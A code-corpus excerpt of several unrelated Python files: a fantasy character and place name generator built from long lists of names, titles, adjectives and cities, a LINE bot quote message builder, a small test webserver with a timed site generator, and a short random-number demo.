"David", "Yehotan", "Daniel", "Ariel", "Moshe", "Eitan", "Noam", "Amit", "Ariel", "Daniel", "Adi", "Ma'ayan", "Yuval", "Yahli", "Omer", "Lior", "Mohammad", "Ahmad", "Mahmed", "Yusuf", "Abed", "Adam", "Omar", "Ali", "Mahmoud", "Amir",
"George", "Elias", "Majd", "Daniel", "Yusuf", "Ha", "Julian", "Charbel", "Jude", "Amir", "Adam", "Omri", "Eyal", "Amir", "Salman", "Rani", "Tamir", "Yosef", "Bahah", "Daniel", "Hiroto", "Ren", "Yuuma", "Mito", "Haruto", "Shota", "Yuuto",
"Haruto", "Souma", "Sota", "Mohammad", "Ahmad", "Abdul", "Rahman", "Muhamad", "Ahmad", "Adam", "Aqil", "Aryan", "Yusuf", "Putera", "Mikhail", "Emir", "Ariff", "ranbaatar", "Batukhan", "Bataar", "Chuluun", "Sukhbataar", "Mohammad", "Ali",
"Hussain", "Omar", "Bilal", "Usman", "Zahid", "Shahid", "Saqib", "Nomaan", "John", "Paul", "Justin", "Renz", "Clarence", "John", "Carl", "Kevin", "Richard", "Ezekiel", "Jared", "Xyriel", "Min-jun", "Ji-hu", "Ji-hoon", "Jun-seo", "Hyun-woo",
"Ye-jun", "Kun-woo", "Hyun-jun", "Min-jae", "Woo-jin", "Chia-hao", "Chih-ming", "Chun-chieh", "Chien-hung", "Chun-hung", "Muhammad", "Yusuf", "Abdullo", "Abubakr", "Somchai", "Somsak", "Somporn", "Somboon", "Prasert", "Yusuf", "Mustafa",
"Berat", "Emir", "Mehmet", "Ahmet", "Muhammed", "Enes", "A-mer", "Emirhan", "Mohammad", "Abdullah", "Ahmed", "Ali", "Khalid", "Saeed", "Omar", "Rashid", "Maryam", "Zhen", "Jing", "Ying", "Yan", "Li", "Xiaoyan", "Xinyi", "Jie", "Lili",
"Xiaomei", "Tingting", "Saanvi", "Aanya", "Aadhya", "Aaradhya", "Anya", "Pari", "Anika", "Vya", "Angel", "Diya", "Anya", "Anika", "Aradhya", "Harini", "Avya", "Ridhi", "Rishika", "Sanvi", "Shreya", "Trisha", "Fatemeh", "Zahra", "Setayesh",
"Hasti", "Zeib", "zanin-Zahra", "Reihaneh", "Maryam", "Mobi", "Fatemeh", "Zahra", "Maryam", "Ma'soumeh", "Sakineh", "Zeib", "Roghayyeh", "Khadije", "Leyla", "Somayyeh", "Noa", "Shira", "Tamar", "Talia", "Maya", "Yael", "Sarah", "Adele",
"Ayala", "Michal", "Noam", "Amit", "Ariel", "Daniel", "Adi", "Ma'ayan", "Yuval", "Yahli", "Omer", "Lior", "Maryam", "Rahaf", "Leen", "Lian", "Rimas", "Hala", "Noor", "Bisan", "Malk", "Aya", "Maria", "Celine", "Aline", "Maya", "Noor",
"Lian", "Maryam", "talie", "Tala", "Miral", "Eden", "Yarin", "Nur", "Sarah", "Sillin", "Assil", "Malk", "Maya", "Aya", "Miyar", "Yui", "Hi", "Aoi", "Yua", "Yui", "Rin", "Airi", "Koharu", "Airi", "Mei", "Rimas", "Ja", "Hala", "Nor",
"Puteri", "Siti", "Aishah", "Sara", "Sophia", "Nurin", "Rania", "Hanh", "Khayla", "Odval", "Bolormaa", "Bayarmaa", "Oyunbileg", "Khongordzol", "Fatima", "Fozia", "Sadia", "Sobia", "dia", "Maryam", "Farza", "Ayesha", "Sakee", "Zaib",
"Althea", "Jessa Mae", "Rhea Mae", "Mary Rose", "Kyla", "April Joy", "Jane", "Alexandra", "Precious", "Althea Mae", "Seo-yeon", "Min-seo", "Seo-hyeon", "Ji-woo", "Seo-yun", "Ji-min", "Su-bin", "Ha-eun", "Ye-eun", "Yun-seo", "Shu-fen",
"Shu-hui", "Mei-ling", "Ya-ting", "Mei-hui", "Sumayah", "Asiya", "Oisha", "Googoosh", "Anohito", "Indira", "Zeynep", "Elif", "Ecrin", "Dave", "Aard")
#from wikipedia and some rpg class list
properTitles = ("Emperor", "Empress", "King", "Queen", "Viceroy", "Vicereine", "Prince", "Princess", "Duke", "Duchess", "Count", "Countess", "Baron", "Baroness", "Pope", "Viscount", "Viscountess", "Earl", "Marquis", "Marquess", "Archon", "Tsar",
"Tsarina", "Representative", "Senator", "Speaker", "President", "Councillor", "Alderman", "Delegate", "Mayor", "Mayoress", "Governor", "Governess", "Prefect", "Prelate", "Premier", "Burgess", "Ambassador", "Envoy", "Secretary",
"Minister", "Attach", "Provost", "Advocate", "Attorney", "Bailiff", "Barrister", "Chancellor", "Judge", "Justice", "Magistrate", "Promagistrate", "Chairman", "Mufti", "Solicitor", "Lictor", "Reeve", "Seneschal", "Tribune",
"Abbess", "Abbot", "Brother", "Sister", "Friar", "Mother", "Father", "Bishop", "Presbyter", "Priest", "Sheperd", "Patriarch", "Pope", "Catholicos", "Vicar", "Chaplain", "Canon", "Pastor", "Prelate", "Dom", "Cardinal", "Ter", "Coach",
"Venerable", "Blessed", "Saint", "Messiah", "Deacon", "Archdeacon", "Acolyte", "Dean", "Elder", "Minister", "Monsignor", "Reader", "Almoner", "Colonel", "General", "Commodore", "Corporal", "Sergeant", "Admiral", "Brigadier",
"Captain", "Commander", "General", "Officer", "Lieutenant", "Major", "Vicar", "Private", "Constable", "Agent", "Principal", "Comrade", "Dictator",
"Fighter", "Barbarian", "Knight", "Swashbuckler", "Paladin", "Dark Knight", "Dragon Knight", "Samurai", "Warlord", "Hero", "Magician", "Inherent Gift Magician", "Theurgist Magician", "Summoner Magician", "Vancian Magician",
"Red Mage:", "Blue Mage:", "Necromantic Magician", "Illusionist Magician", "Nature Magician", "Elemental Magician", "Druid Magician", "Shamanic Magician", "Elemental Magician", "Rogue", "Thief", "Assassin", "Gambler", "Ninja",
"Shadow", "Pirate", "Scout", "Cleric", "Priest", "Battle Priest", "Witch Doctor", "Templar", "Caster", "Ranger", "Sniper Ranger", "Bow and Blade Ranger", "Beastmaster Ranger", "Dual Wielding Ranger", "Trapper Ranger",
"Magical Ranger", "Magic Knight", "Bard", "Dancer", "Monk", "Engineer", "Alchemist", "Psychic", "Gunslinger","Brute"
"Arch", "Grand", "Prime", "Head", "Lord", "Chief", "Superior", "High", "Supreme")
#from myvocabulary.com
adjectives = ("Able", "Abundant", "Accepting", "Accommodating", "Active", "Addictive", "Adequate", "Aggressive", "Amazing", "Amiable", "Amicable", "Amusing", "Antagonistic", "Anxious", "Anxious", "Apathetic", "Aquatic", "Arrogant", "Articulate",
"Artistic", "Attentive", "Attractive", "Authoritative", "Awesome", "Barren", "Benevolent", "Biodegradable", "Blase", "Bold", "Bonding", "Boorish", "Bountiful", "Braggart", "Brave", "Brilliant", "Buoyant", "Busy", "Buzzing", "Callow",
"Captious", "Caring", "Celestial", "Charming", "Chaste", "Cheating", "Cheerful", "Churlish", "Civil", "Clean", "Clever", "Cold", "Colossal", "Combustible", "Comfortable", "Commercial", "Communicative", "Compact", "Competitive",
"Compulsive", "Confident", "Conflicted", "Congenial", "Conscientious", "Conservative", "Considerate", "Conspicuous", "Contemptible", "Contiguous", "Cooperative", "Cordial", "Courageous", "Courteous", "Covetous", "Creative", "Critical",
"Critical", "Crucial", "Crude", "Curious", "Current", "Curt", "Cynical", "Decent", "Decorous", "Defensive", "Deferential", "Deft", "Dejected", "Delightful", "Demeaning", "Demise", "Dependable", "Deplorable", "Depressed",
"Destructive", "Devious", "Devoted", "Dictatorial", "Diligent", "Diminutive", "Diplomatic", "Discreet", "Disdainful", "Dishonesty", "Dishonorable", "Disposable", "Disrespectful", "Distracted", "Docile", "Downcast", "Dynamic", "Dynamic",
"Earnest", "Earthy", "Ecological", "Efficient", "Egotistical", "Electrifying", "Elitist", "Empathetic", "Endangered", "Endemic", "Energetic", "Enigmatic", "Enthusiastic", "Esteemed", "Estimable", "Ethical", "Euphoric", "Evergreen",
"Exclusive", "Expectant", "Explosive", "Exquisite", "Extravagant", "Extrovert", "Exuberant", "Fair", "Faithful", "Fallow", "Falseness", "Famous", "Fancy", "Ferocious", "Fertile", "Fervent", "Fervid", "Fibrous", "Fierce", "Flexible",
"Focused", "Forgiving", "Forlorn", "Frail", "Generous", "Genial", "Genteel", "Gentle", "Genuine", "Gifted", "Gigantic", "Glib", "Gloomy", "Good", "Gorgeous", "Grace", "Gracious", "Grand", "Grateful", "Grabby", "Grouchy",
"Guilty", "Guilty", "Gusty", "Happy", "Hard-hearted", "Healing", "Heedless", "Helpfulness", "Heroic", "Honest", "Honorable", "Hopeful", "Hostile", "Humane", "Humble", "Humorous", "Hygienic", "Hysterical", "Idealistic", "Idolize",
"Ignoble", "Ignorant", "Ill-tempered", "Impartial", "Impolite", "Improper", "Imprudent", "Impudent", "Indecent", "Indecorous", "Indifference", "Indigenous", "Industrious", "Ingenuous", "Innocent", "Innovative", "Insightful", "Insolent",
"Inspirational", "Instructive", "Insulting", "Intense", "Intense", "Intense", "Intolerant", "Introvert", "Intuitive", "Inventive", "Investigative", "Irresponsible", "Jaundiced", "Jealous", "Jealous", "Jocular", "Jolly",
"Jovial", "Joyful", "Jubilant", "Just", "Juvenile", "Keen", "Kind", "Kindred", "Knowledgeable", "Liberal", "Listener", "Loathsome", "Loving", "Loyal", "Magical", "Magnificent", "Malevolent", "Malicious", "Mammoth",
"Manipulative", "Marine", "Mastery", "Meddling", "Meritorious", "Meticulous", "Migratory", "Minuscule", "Miserable", "Mistrustful", "Modest", "Moral", "Mysterious", "Naive", "Nascent", "Native", "Natural", "Natural", "Nature", "Needy",
"Nefarious", "Negative", "Neglected", "Neglectful", "Negligent", "Nice", "Noble", "Notorious", "Obedient", "Observant", "Open", "Open-minded", "Opinionated", "Oppressive", "Orderly", "Oriented", "Original", "Outrageous", "Outspoken",
"Parasitic", "Partial", "Passionate", "Patient", "Perceptive", "Personable", "Personal", "Petulant", "Pleasant", "Poise", "Polite", "Pollutant", "Popular", "Popular", "Powerful", "Prejudicial", "Preposterous", "Pretentious", "Prideful",
"Principled", "Pristine", "Prompt", "Proper", "Punctual", "Purposeful", "Quaint", "Quarrelsome", "Quick", "Quiet", "Quiet", "Quirky", "Radioactive", "Rancorous", "Rational", "Reasonable", "Reckless", "Refined", "Reflective", "Reliant",
"Remarkable", "Remorseful", "Repugnant", "Resilient", "Resilient", "Resolute", "Resourceful", "Respectful", "Responsible", "Responsive", "Restorative", "Reverent", "Rotting", "Rude", "Ruthless", "Sad",
"Safe", "Scornful", "Scrumptious", "Selfish", "Sensible", "Sensitive", "Simple", "Sober", "Solar", "Solemn", "Solitary", "Sour", "Spatial", "Special", "Splendid", "Splendid", "Staunch", "Staunch", "Stern", "Stunning",
"Successful", "Sullen", "Superb", "Superior", "Supportive", "Surly", "Suspicious", "Sweet", "Sympathetic", "Tactful", "Taint", "Temperate", "Temperate", "Tenacious", "Terrific", "Testy", "Thoughtful", "Thoughtless", "Tolerant", "Towering",
"Toxic", "Treacherous", "Tropical", "Trustworthy", "Truthful", "Ultimate", "Ultimate", "Uncivil", "Uncouth", "Undeveloped", "Unethical", "Unfair", "Unique", "Unique", "Unmannerly", "Unrefined", "Unsavory", "Unworthy",
"Uplifting", "Upright", "Uproot", "Upstanding", "Valiant", "Veracious", "Versatile", "Vicious", "Vigilant", "Vigilant", "Vigorous", "Vile", "Villainous", "Virtuous", "Visible", "Visible", "Vivacious", "Vocal", "Volatile", "Volunteering",
"Vulnerable", "Warm", "Wary", "Waspish", "Watchful", "Welcoming", "Wicked", "Wild", "Willing", "Winning", "Winsome", "Wise", "Wishy-washy", "Wistful", "Witty", "Woeful", "Wonderful", "Worried", "Worthwhile", "Worthy")
lesser = ("Assistant", "Aide", "Lieutenant", "Sergent", "Hand", "Envoy", "Chosen", "Protege", "Helper", "Attendant", "Squire", "Page", "Trainee", "Padawan", "Vice")
#wikipedia
countryNames = ["Abkhazia", "Afghanistan", "Albania", "Algeria", "Andorra", "Angola", "Antigua", "and", "Barbuda", "Argentina", "Armenia", "Australia", "Austria", "Azerbaijan", "Bahamas,", "The", "Bahrain", "Bangladesh", "Barbados", "Belarus", "Belgium",
"Belize", "Benin", "Bhutan", "Bolivia", "Bosnia", "and", "Herzegovina", "Botswana", "Brazil", "Brunei", "Bulgaria", "Burkina", "Faso", "Burma", "Burundi", "Cambodia", "Cameroon", "Canada", "Cape", "Verde", "Central", "African", "Republic", "Chad",
"Chile", "China", "Taiwan", "Colombia", "Comoros", "Congo,", "Democratic", "Republic", "of", "the", "Congo,", "Republic", "of", "the", "Cook", "Islands", "Costa", "Rica", "Ivory", "Coast", "Croatia", "Cuba", "Cyprus", "Czech", "Republic", "Korea,",
"North", "Congo,", "Democratic", "Republic", "of", "the", "Denmark", "Djibouti", "Dominica", "Dominican", "Republic", "East", "Timor", "Ecuador", "Egypt", "El", "Salvador", "Equatorial", "Guinea", "Eritrea", "Estonia", "Ethiopia", "Fiji", "Finland",
"France", "Gabon", "Gambia,", "The", "Georgia", "Germany", "Ghana", "Greece", "Grenada", "Guatemala", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Vatican", "City", "Honduras", "Hungary", "Iceland", "India", "Indonesia", "Iran", "Iraq", "Ireland",
"Israel", "Italy", "Ivory", "Coast", "Jamaica", "Japan", "Jordan", "Kazakhstan", "Kenya", "Kiribati", "Korea,", "North", "Korea,", "South", "Kosovo", "Kuwait", "Kyrgyzstan", "Laos", "Latvia", "Lebanon", "Lesotho", "Liberia", "Libya", "Liechtenstein",
"Lithuania", "Luxembourg", "Macedonia", "Madagascar", "Malawi", "Malaysia", "Maldives", "Mali", "Malta", "Marshall", "Islands", "Mauritania", "Mauritius", "Mexico", "Micronesia,", "Federated", "States", "of", "Moldova", "Monaco", "Mongolia", "Montenegro",
"Morocco", "Mozambique", "Burma", "Nagorno-Karabakh", "Namibia", "Nauru", "Nepal", "Netherlands", "New", "Zealand", "Nicaragua", "Niger", "Nigeria", "Niue", "Northern", "Cyprus", "Korea,", "North", "Norway", "Oman", "Pakistan", "Palau", "Palestine",
"Panama", "Papua", "New", "Guinea", "Paraguay", "Peru", "Philippines", "Poland", "Portugal", "Transnistria", "Qatar", "Korea,", "South", "Congo,", "Republic", "of", "the", "Romania", "Russia", "Rwanda", "Sahrawi", "Arab", "Democratic", "Republic", "Saint",
"Kitts", "and", "Nevis", "Saint", "Lucia", "Saint", "Vincent", "and", "the", "Grenadines", "Samoa", "San", "Marino", "Sao", "Tome", "and", "Principe", "Saudi", "Arabia", "Senegal", "Serbia", "Seychelles", "Sierra", "Leone", "Singapore", "Slovakia", "Slovenia", "Solomon", "Islands", "Somalia", "Somaliland", "South", "Africa", "Korea,", "South", "South", "Ossetia", "South", "Sudan", "Spain", "Sri", "Lanka", "Sudan", "South", "Sudan", "Suriname", "Swaziland", "Sweden", "Switzerland", "Syria", "Taiwan", "Tajikistan", "Tanzania", "Thailand", "East", "Timor", "Togo", "Tonga", "Transnistria", "Trinidad", "and", "Tobago", "Tunisia", "Turkey", "Turkmenistan", "Tuvalu", "Uganda", "Ukraine", "United", "Arab", "Emirates", "United", "Kingdom", "United", "States", "Uruguay", "Uzbekistan", "Vanuatu", "Vatican", "City", "Venezuela", "Vietnam", "Yemen", "Zambia", "Zimbabwe", "Abkhazia", "Cook", "Islands", "Kosovo", "Niue", "Northern", "Cyprus", "Sahrawi", "Arab", "Democratic", "Republic", "Somaliland", "South", "South", "North", "East", "West", "Ossetia", "Taiwan", "Transnistria"
"New York", "Los Angeles", "Chicago", "Houston", "Philadelphia", "Phoenix", "San Antonio", "San Diego", "Dallas", "San Jose", "Austin", "Jacksonville", "Indianapolis", "San Francisco", "Columbus", "Fort Worth", "Charlotte", "Detroit", "El Paso", "Memphis", "Boston", "Seattle", "Denver", "Washington", "Nashville", "Baltimore", "Louisville", "Portland", "Oklahoma City", "Milwaukee", "Las Vegas", "Albuquerque", "Tucson", "Fresno", "Sacramento", "Long Beach", "Kansas City", "Mesa", "Virginia Beach", "Atlanta", "Colorado Springs", "Raleigh", "Omaha", "Miami", "Oakland", "Tulsa", "Minneapolis", "Cleveland", "Wichita", "Arlington", "New Orleans", "Bakersfield", "Tampa", "Honolulu", "Anaheim", "Aurora", "Santa Ana", "St. Louis", "Riverside", "Corpus Christi", "Pittsburgh", "Lexington", "Anchorage", "Stockton", "Cincinnati", "Saint Paul", "Toledo", "Newark", "Greensboro", "Plano", "Henderson", "Lincoln", "Buffalo", "Fort Wayne", "Jersey City", "Chula Vista", "Orlando", "St. Petersburg", "Norfolk", "Chandler", "Laredo", "Madison", "Durham", "Lubbock", "Winston–Salem", "Garland", "Glendale", "Hialeah", "Reno", "Baton Rouge", "Irvine", "Chesapeake", "Irving", "Scottsdale", "North Las Vegas", "Fremont", "Gilbert", "San Bernardino", "Boise", "Birmingham", "Rochester", "Richmond", "Spokane", "Des Moines", "Montgomery", "Modesto", "Fayetteville", "Tacoma", "Shreveport", "Fontana", "Oxnard", "Aurora", "Moreno Valley", "Akron", "Yonkers", "Columbus", "Augusta", "Little Rock", "Amarillo", "Mobile", "Huntington Beach", "Glendale", "Grand Rapids", "Salt Lake City", "Tallahassee", "Huntsville", "Worcester", "Knoxville", "Grand Prairie", "Newport News", "Brownsville", "Santa Clarita", "Overland Park", "Providence", "Jackson", "Garden Grove", "Oceanside", "Chattanooga", "Fort Lauderdale", "Rancho Cucamonga", "Santa Rosa", "Port St. Lucie", "Ontario", "Tempe", "Vancouver", "Springfield", "Cape Coral", "Pembroke Pines", "Sioux Falls", "Peoria", "Lancaster", "Elk Grove", "Corona", "Eugene", "Salem", "Palmdale", "Salinas", "Springfield", "Pasadena", "Rockford", "Pomona", "Hayward", "Fort Collins", "Joliet", "Escondido", "Kansas City", "Torrance", "Bridgeport", "Alexandria", "Sunnyvale", "Cary", "Lakewood", "Hollywood", "Paterson", "Syracuse", "Naperville", "McKinney", "Mesquite", "Clarksville", "Savannah", "Dayton", "Orange", "Fullerton", "Pasadena", "Hampton", "McAllen", "Killeen", "Warren", "West Valley City", "Columbia", "New Haven", "Sterling Heights", "Olathe", "Miramar", "Thousand Oaks", "Frisco", "Cedar Rapids", "Topeka", "Visalia", "Waco", "Elizabeth", "Bellevue", "Gainesville", "Simi Valley", "Charleston", "Carrollton", "Coral Springs", "Stamford", "Hartford", "Concord", "Roseville", "Thornton", "Kent", "Lafayette", "Surprise", "Denton", "Victorville", "Evansville", "Midland", "Santa Clara", "Athens", "Allentown", "Abilene", "Beaumont", "Vallejo", "Independence", "Springfield", "Ann Arbor", "Provo", "Peoria", "Norman", "Berkeley", "El Monte", "Murfreesboro", "Lansing", "Columbia", "Downey", "Costa Mesa", "Inglewood", "Miami Gardens", "Manchester", "Elgin", "Wilmington", "Waterbury", "Fargo", "Arvada", "Carlsbad", "Westminster", "Rochester", "Gresham", "Clearwater", "Lowell", "West Jordan", "Pueblo", "San Buenaventura (Ventura)", "Fairfield", "West Covina", "Billings", "Murrieta", "High Point",
"Round Rock", "Richmond", "Cambridge", "Norwalk", "Odessa", "Antioch", "Temecula", "Green Bay", "Everett", "Wichita Falls", "Burbank", "Palm Bay", "Centennial", "Daly City", "Richardson", "Pompano Beach", "Broken Arrow", "North Charleston", "West Palm Beach", "Boulder", "Rialto", "Santa Maria", "El Cajon", "Davenport", "Erie", "Las Cruces", "South Bend", "Flint", "Kenosha",
"London", "Berlin", "Madrid", "Rome", "Paris", "Bucharest", "Vienna", "Hamburg", "Budapest", "Warsaw", "Barcelona", "Milan", "Munich", "Prague", "Sofia", "Brussels", "Birmingham", "Cologne", "Naples", "Turin", "Stockholm", "Marseille", "Amsterdam", "Valencia", "Zagreb", "Krakow", "Leeds", "Lodz", "Seville", "Frankfurt", "Zaragoza", "Riga", "Athens", "Palermo", "Wroclaw", "Rotterdam", "Genoa", "Helsinki", "Stuttgart", "Glasgow", "Dusseldorf", "Dortmund", "Mcalaga", "Essen", "Copenhagen", "Sheffield", "Poznan", "Lisbon", "Bremen", "Vilnius", "Gothenburg", "Dresden", "Dublin", "Bradford", "Leipzig", "Antwerp", "Manchester", "Hannover", "The_Hague", "Edinburgh", "Nuremberg", "Duisburg", "Lyon", "Liverpool", "Gdansk", "Toulouse", "Murcia", "Bristol", "Tallinn", "Bratislava", "Szczecin", "Palma de Mallorca", "Bologna", "Las Palmas de Gran Canaria", "Florence", "Brno", "Bydgoszcz", "Bochum", "Bilbao", "Cardiff", "Lublin", "Nice", "Wuppertal", "Plovdiv", "Varna", "Alicante", "Leicester", "Córdoba", "Bielefeld", "City of Wakefield", "Thessaloniki", "Utrecht", "Metropolitan Borough of Wirral", "Aarhus", "Bari", "Coventry", "Valladolid", "Bonn", "Cluj", "Napoca", "Malmö", "Nottingham", "Katowice", "Kaunas", "Timisoara",
"San", "Pan", "Narnia", "Moria", "Shire", "Tamriel"]
countrySylables = []
#minecraft+my own spin
areaBiome = ["Taiga", "Plain", "River", "Beach", "Hill", "Mountain", "Island", "Cliff", "Headland", "Moor", "Highland", "Desert", "Forest", "Jungle", "Swamp", "Savannah", "Mesa", "Plateau", "Ocean", "Wasteland", "Valley", "Chasm", "Abyss", "Waterfall",
"Town", "Village", "City", "Alley", "Slum", "Homestead", "Cabin", "Camp", "Road", "Highway", "Tower", "Citadel", "Compound", "Complex", "Keep", "Dungeon", "Castle", "Crypt", "Cellar", "Tomb", "Ruin", "Fortress",
"Great Hall", "Town Center", "Monastary", "Church", "Cathedrel", "Temple", "Coast", "Port"]
#minecraft+my own spin
areaAdj = ["Snowy", "Frozen", "Cold", "Flamed", "Hot", "Rainy", "Stormy", "Mega", "Great", "Holy", "Unholy", "Spruce", "Stone", "Deep", "Foul", "Withered", "Courrupted", "Dark", "Bright", "Stunning", "Sunken", "Watery", "Slimey", "Oozing"]
def flatten(l, limit=1000, counter=0):
for i in xrange(len(l)):
if (isinstance(l[i], (list, tuple)) and
counter < limit):
for a in l.pop(i):
l.insert(i, a)
i += 1
counter += 1
return flatten(l, limit, counter)
return l
def break_string(string, letterType):
if(len(string)<6):
return string
listSyla = []
listOfIndecies= [letterType.find("VCC"),letterType.find("CVC"),letterType.find("VVC"),letterType.find("CCC")]
if(listOfIndecies[0] < 3 ):
listOfIndecies[0] = letterType[2:].find("VCC")+2
if(listOfIndecies[1] < 3 ):
listOfIndecies[1] = letterType[2:].find("CVC")+2
if(listOfIndecies[2] < 3 ):
listOfIndecies[2] = letterType[2:].find("VVC")+2
if(listOfIndecies[3] < 3 ):
listOfIndecies[3] = letterType[2:].find("CCC")+2
for i in listOfIndecies:
if(i > 1 and i + 2 < len(string)):
listSyla.append(break_string(string[:i+1],letterType[:i+1]))
listSyla.append(break_string(string[i+1:],letterType[i+1:]))
if(listSyla == []):
return string
return listSyla
def split_by_syllable(stringList=("")):
newList = []
for current in stringList:
split = current.split()
for curr in split:
split2 = curr.split("–")
for curr in split2:
newList.append(curr.lower().translate(None,',.-_%0123456789'))
vowel = ['a','e','i','o','u','y']
const = ['q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m']
typeList = copy.deepcopy(newList)
for i in range(0,len(newList)):
for v in vowel:
typeList[i] = typeList[i].replace(v,"V")
for c in const:
typeList[i] = typeList[i].replace(c,"C")
listSyla = []
for i in range(0,len(newList)):
listSyla.append(break_string(newList[i],typeList[i]))
listSyla = flatten(listSyla)
return listSyla
def item():
return itemEffect[random.randint(0,len(itemEffect)-1)]+" "+qualityType[random.randint(0,len(qualityType)-1)]+" "+materialType[random.randint(0,len(materialType)-1)]+" "+itemType[random.randint(0,len(itemType)-1)]
def name_assist(titleVar, title, adj, name):
if(random.random() < 0.3):
title2 = title+random.randint(1,titleVar)
if(random.random()<0.5):
title2 = -title2
string = name+"'s "+lesser[random.randint(0,len(lesser)-1)]+" "+properTitles[title2]+", "+firstNames[random.randint(0,len(firstNames)-1)]
else:
if(random.random() < 0.5):
adj += random.randint(1,5)
else:
adj -= random.randint(1,5)
string = name+"'s "+adjectives[adj]+" "+lesser[random.randint(0,len(lesser)-1)]+", "+firstNames[random.randint(0,len(firstNames)-1)]
return string
def name():
titleVar = 4;
title = random.randint(titleVar,len(properTitles)-1-titleVar)
adj = random.randint(5,len(adjectives)-6)
string = firstNames[random.randint(0,len(firstNames)-1)]+" the "+adjectives[adj]+" "+properTitles[title]#+" "+properTitles[random.randint(title-10,title+10)]
#string += "\n\tcarrying the: "+item()
#string += "\n\t "+item()
string += "\n "+name_assist(titleVar, title, adj, string.partition(' ')[0])
#string += "\n\tcarrying the: "+item()
string += "\n "+name_assist(titleVar, title, adj, string.partition(' ')[0])
#string += "\n\tcarrying the: "+item()
string += "\n"
return string
def area_name(length=4, startingLetter=None):
def syl():
return countrySylables[random.randint(0,len(countrySylables)-1)].lower()
name = syl()
while(len(name)<length):
name += syl()
# set up the vowel and constonant status
vowel = ['a','e','i','o','u','y']
const = ['q','w','r','t','p','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m']
typeString = name
for v in vowel:
typeString = typeString.replace(v,"V")
for c in const:
typeString = typeString.replace(c,"C")
#early failure
#optional 2-character bad combos: "rc","rs","rk","nd","tb","nb","mb","pz","rl","rf","lt","ld","nt","mh","gf",
badCombos = ["pmb","ngf","fkt","crm","vns","vms"]
for c in badCombos:
if(name.find(c) >= 0):
return area_name(length)
if(typeString.find("CCCC") >= 0 or typeString.count("C") > typeString.count("V")*4 or typeString.count("C") <= typeString.count("V") or name[0] == name[1]):
return area_name(length)
if(typeString[:3]=="CCC"):
typeString = typeString[2:]
name = name[2:]
if(typeString[:2]=="CC"):
typeString = typeString[1:]
name = name[1:]
if(len(name)<length):
return area_name(length)
return name.title()
def descriptive_area(length=6):
name = areaAdj[random.randint(0,len(areaAdj)-1)]
name += " " + areaBiome[random.randint(0,len(areaBiome)-1)]
name += " of " + area_name(length)
return name
#do not call, is broken
def drawMain():
segment_length = (50,100)
surface = pygame.surface()
shape_center = (150,150)
shape_variance = (100,100)
def getPoint(initPoint=(-1,-1)):
if(initPoint==(-1,-1)):
initPoint (shape_center[0]+random.randint(-shape_variance[0],shape_variance[0]),
shape_center[1]+random.randint(-shape_variance[1],shape_variance[1]))
angle = random.randint(0,360)
segment_len = random.randint(segment_length[0],segment_length[1])
x = initPoint[0]+segment_len * sin(angle)
y = initPoint[1]+segment_len * cos(angle)
def newMain():
global countrySylables
global firstNames
global properTitles
#print item()
#print adjectives[random.randint(5,len(adjectives)-6)]
#clean the names
newNames = []
for i in range(0,len(firstNames)):
newNames.append(firstNames[i].split())
firstNames = sum(newNames,[])
#clean the titles
newNames = []
for i in range(0,len(properTitles)):
newNames.append(properTitles[i].split())
properTitles = sum(newNames,[])
#clean and sylabate the country names
countrySylables = split_by_syllable(countryNames)
for i in range(0,10):
#print descriptive_area()
print name()
newMain()
|
996,157 | 50eae9bae36fa7af616c1f0bc161d5552204bc9b | # some future comment
from line_bot_app.constants import AcceptedUserTextMessages
import random
def get_quote_flex_message(quotesAndAuthors="", imageUrl="", quoteText="", quoteAuthor=""):
randomEntryInResponse = random.choice(quotesAndAuthors)
quoteText, quoteAuthor = randomEntryInResponse.get("text", ""), randomEntryInResponse.get("author", "")
return {
"type": "bubble",
"size": "kilo",
"header": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "#Random Quote",
"weight": "bold",
"style": "italic",
"decoration": "underline",
"align": "center",
"size": "xl",
"margin": "xs",
"color": "#2b2a27"
}
],
"backgroundColor": "#ffd42b"
},
"hero": {
"type": "image",
"url": imageUrl,
"size": "full",
"aspectRatio": "17:10",
"aspectMode": "cover",
"margin": "none"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": quoteText,
"weight": "bold",
"size": "lg",
"wrap": True,
"color": "#2b2a27"
},
{
"type": "text",
"text": "~" + quoteAuthor + "~",
"margin": "sm",
"color": "#2b2a2a"
}
],
"backgroundColor": "#ffd42b",
"borderWidth": "none",
"cornerRadius": "none",
"margin": "none",
"spacing": "none"
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "button",
"action": {
"type": "message",
"label": "Another Quote Please",
"text": AcceptedUserTextMessages.QUOTE.value
},
"position": "relative",
"margin": "sm",
"height": "sm",
"style": "primary",
"color": "#e6be20"
}
],
"flex": 0
}
}
|
996,158 | 9eb704115981ed9d4b3cc829125d3721786c7c20 | #
# A simple webserver MEANT FOR TESTING based off of http.server.
#
import http.server
import socketserver
import os
from multiprocessing import Process
import generate
import yaml
from threading import Timer
# Credit: http://stackoverflow.com/a/13151299/6388442
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
def serve(PORT=80, SERVE="."):
# Declare the processes
serveProcess = Process(target=rawServe, args=[PORT, SERVE])
genProcess = Process(target=autoGen)
serveProcess.start()
genProcess.start()
def rawServe(PORT, SERVE):
print("rawServe started.")
web_dir = os.path.join(os.path.dirname(__file__), SERVE)
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("Serving at port: ", PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("^C: Ending rawServe...")
def autoGen():
print("AutoGen started.")
print("Loading config...")
config = yaml.load(open("config/painless.yml", "r").read())
print("Setting timer...")
rt = RepeatedTimer(config["options"]["reloadTime"], generate.generate, config["options"]["outputDirectory"]) # Auto-starts
|
996,159 | 84c8b818d48c3bc26af113552ba465ff53813035 | import random
print(f'0 <= r < 1 사이의 랜덤 실수: {random.random()}')
print(f'0~9까지 랜덤 정수: {int(random.random() * 10)}')
